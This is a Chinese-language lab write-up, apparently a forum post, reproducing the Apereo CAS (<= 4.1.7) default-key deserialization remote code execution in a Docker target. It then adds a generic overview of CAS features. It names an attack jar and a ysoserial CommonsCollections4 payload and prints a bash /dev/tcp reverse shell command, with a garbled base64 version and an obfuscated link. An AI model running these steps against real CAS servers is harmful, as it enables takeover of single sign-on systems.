Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。影响版本 Apereo CAS <= 4.1.7
实战中sessionkey也不允许从后端发送前端传输sessionkey不允许出现在响应包和请求包里反序列化过程中拿到key就能rce
docker search查看镜像可用版本信息:docker pull apereo/cas获取最新镜像,如果你有指定的版本,后面加上冒号版本号即可命令如下:
docker ps查看端口信息:
攻击机查看靶场环境,靶机IP:8080/cas/login
漏洞利用参数 登录处 抓包 可看到
使用apereo-cas-attack-1.0-SNAPSHOT-all.jar生成加密的ysoserial的序列化对象payload下载地址:992K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3V1k6m8M7r3g2J5k6h3!0Q4x3X3c8o6b7g2y4Q4x3X3c8m8N6s2c8S2j5$3E0Q4x3V1k6J5k6h3I4W2j5i4y4W2M7#2)9J5c8X3c8G2N6$3&6D9L8$3q4V1i4K6u0r3N6U0q4Q4x3X3f1H3i4K6u0W2x3q4)9J5c8X3q4H3k6i4u0W2L8#2)9J5k6r3y4S2M7#2)9J5k6r3q4@1N6r3q4U0K9#2)9J5k6o6q4Q4x3X3f1H3i4K6u0V1f1@1&6m8f1q4y4t1e0#2c8Q4x3X3c8S2L8r3I4Q4x3X3g2B7j5i4t1`.
要执行的命令 在后边输入 反弹shell需要编码使用ysoserial的CommonsCollections4生成加密后的Payload:
docker exec -it xxxxxx bash
bash -i >& /dev/tcp/ip/12340 0>&1base64编码:YmFzaCAtaSA+JiAvZGV2zNS4xMDQvMTIzNDAgMD4mMQ==遇到的问题:防火墙没给端口放行shell成功
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)应用程序,用于为多个应用程序提供统一的身份认证和授权服务。CAS 提供了以下几个主要的用途:
1
、单点登录(SSO):Apereo CAS 允许用户在一次认证后访问多个相互信任的应用程序,无需再次输入凭据。用户只需要登录一次,然后就可以自由地访问其他已集成到 CAS 的应用程序。
2
、身份认证和授权:CAS 提供了强大的身份认证和授权机制,确保只有经过认证和授权的用户才能访问被保护的资源。CAS 支持多种认证方式,包括用户名
/
密码认证、基于证书的认证、双因素认证等。
3
、客户端与服务端的集成:Apereo CAS 提供了客户端和服务端的组件,可以轻松地将 CAS 集成到现有的应用程序中。CAS 客户端负责处理用户登录请求,而 CAS 服务端则负责验证用户凭据并发放票据(Ticket),实现单点登录的功能。
4
、安全性和可扩展性:Apereo CAS 提供了多种安全性措施,如防止重放攻击、会话管理、票据管理等。此外,CAS 还具有高度可扩展性,可以轻松地集成到复杂的身份管理和认证架构中
[注意]APP应用上架合规检测服务,协助应用顺利上架!